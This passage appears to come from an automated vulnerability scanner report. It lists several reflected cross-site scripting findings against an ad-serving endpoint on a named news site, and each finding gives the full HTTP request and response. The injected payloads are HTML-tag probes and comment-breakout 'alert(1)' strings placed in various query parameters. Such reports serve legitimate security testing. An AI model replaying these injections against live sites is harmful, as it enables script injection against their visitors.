The value of the CID request parameter is copied into the HTML document as plain text between tags. The payload 642ee<a>fda2e6f65bb was submitted in the CID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0642ee<a>fda2e6f65bb&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303947379727149908227147&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=21799933&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); cbs_test_group=2; MADCAPP=0b1Qte=4&1QpY=2; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:42:08 GMT
Server: Apache/2.2
Content-Length: 582
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:42:08 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0642ee<a>fda2e6f65bb&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303947379727149908227147&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=21799933&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" */
...[SNIP]...

3.543. http://mads.cbsnews.com/mac-ad [CID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the CID request parameter is copied into a JavaScript inline comment. The payload 353f6*/alert(1)//61d8246abf9 was submitted in the CID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0353f6*/alert(1)//61d8246abf9&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:10 GMT
Server: Apache/2.2
Content-Length: 1141
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:19:10 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0353f6*/alert(1)//61d8246abf9&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad
...[SNIP]...

3.544. http://mads.cbsnews.com/mac-ad [CNET-PAGE-GUID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the CNET-PAGE-GUID request parameter is copied into a JavaScript inline comment. The payload f0408*/alert(1)//ce539dfd607 was submitted in the CNET-PAGE-GUID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252f0408*/alert(1)//ce539dfd607&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=51611017&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:19:56 GMT
Server: Apache/2.2
Content-Length: 616
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:19:56 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252f0408*/alert(1)//ce539dfd607&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=51611017&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2000' NCAT='100:' CID='0' TO BEACON TEXT) */;wi
...[SNIP]...

3.545. http://mads.cbsnews.com/mac-ad [CNET-PAGE-GUID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the CNET-PAGE-GUID request parameter is copied into the HTML document as plain text between tags. The payload 548bb<a>e46200be093 was submitted in the CNET-PAGE-GUID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107548bb<a>e46200be093&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:23:26 GMT
Server: Apache/2.2
Content-Length: 600
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:23:26 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107548bb<a>e46200be093&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE
...[SNIP]...

3.546. http://mads.cbsnews.com/mac-ad [COOKIE%3AANON_ID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the COOKIE%3AANON_ID request parameter is copied into the HTML document as plain text between tags. The payload 5d050<a>5c0204ce79b was submitted in the COOKIE%3AANON_ID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs5d050<a>5c0204ce79b&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:24:31 GMT
Server: Apache/2.2
Content-Length: 601
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:24:31 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs5d050<a>5c0204ce79b&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='205:' CID='' TO BEACON TEXT) *//* MAC [r201
...[SNIP]...

3.547. http://mads.cbsnews.com/mac-ad [COOKIE%3AANON_ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the COOKIE%3AANON_ID request parameter is copied into a JavaScript inline comment. The payload 9f9f1*/alert(1)//fa279ccbe6 was submitted in the COOKIE%3AANON_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs9f9f1*/alert(1)//fa279ccbe6&x-cb=6412397&IREFER_HOST=cbsnews.com&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; s_cc=true; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=cbscbsnewscomatlantisuat%3D%2526pid%253D/Section%252520-%252520Breaking%252520News%252520Headlines-%252520Business%25252C%252520Entertainment%252520%252526%252520World%252520News%252520-%2525202000%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml%25253Ftag%25253Dstack%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:22:05 GMT
Server: Apache/2.2
Content-Length: 1440
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:22:05 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs9f9f1*/alert(1)//fa279ccbe6&x-cb=6412397&IREFER_HOST=cbsnews.com&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('
...[SNIP]...

3.548. http://mads.cbsnews.com/mac-ad [DVAR_CID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the DVAR_CID request parameter is copied into a JavaScript inline comment. The payload f0f82*/alert(1)//dc135b2d39f was submitted in the DVAR_CID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741f0f82*/alert(1)//dc135b2d39f&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=6412397&IREFER_HOST=cbsnews.com&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; s_cc=true; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=cbscbsnewscomatlantisuat%3D%2526pid%253D/Section%252520-%252520Breaking%252520News%252520Headlines-%252520Business%25252C%252520Entertainment%252520%252526%252520World%252520News%252520-%2525202000%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml%25253Ftag%25253Dstack%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:52 GMT
Server: Apache/2.2
Content-Length: 1484
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:20:52 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741f0f82*/alert(1)//dc135b2d39f&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=6412397&IREFER_HOST=cbsnews.com&ADREQ&SP=80&POS=100&c
...[SNIP]...

3.549. http://mads.cbsnews.com/mac-ad [DVAR_CID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the DVAR_CID request parameter is copied into the HTML document as plain text between tags. The payload e447e<a>93c7a4e2650 was submitted in the DVAR_CID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741e447e<a>93c7a4e2650&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:21:55 GMT
Server: Apache/2.2
Content-Length: 601
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:21:55 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741e447e<a>93c7a4e2650&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cooki
...[SNIP]...

3.550. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into the HTML document as plain text between tags. The payload 1d71d<a>76d65307137 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US1d71d<a>76d65307137&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:24:09 GMT
Server: Apache/2.2
Content-Length: 600
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:24:09 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US1d71d<a>76d65307137&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2100' NCAT='205:'
...[SNIP]...

3.551. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the DVAR_INSTLANG request parameter is copied into a JavaScript inline comment. The payload 2b652*/alert(1)//1571ec7dd99 was submitted in the DVAR_INSTLANG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US2b652*/alert(1)//1571ec7dd99&x-cb=51611017&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:01 GMT
Server: Apache/2.2
Content-Length: 615
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:20:01 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US2b652*/alert(1)//1571ec7dd99&x-cb=51611017&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='162' PTYPE='2000' NCAT='100:' CID='0' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1|78|;cbsne
...[SNIP]...

3.552. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the GLOBAL&CLIENT:ID request parameter is copied into a JavaScript inline comment. The payload 1035b*/alert(1)//41a4215c491 was submitted in the GLOBAL&CLIENT:ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS1035b*/alert(1)//41a4215c491&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:02 GMT
Server: Apache/2.2
Content-Length: 1114
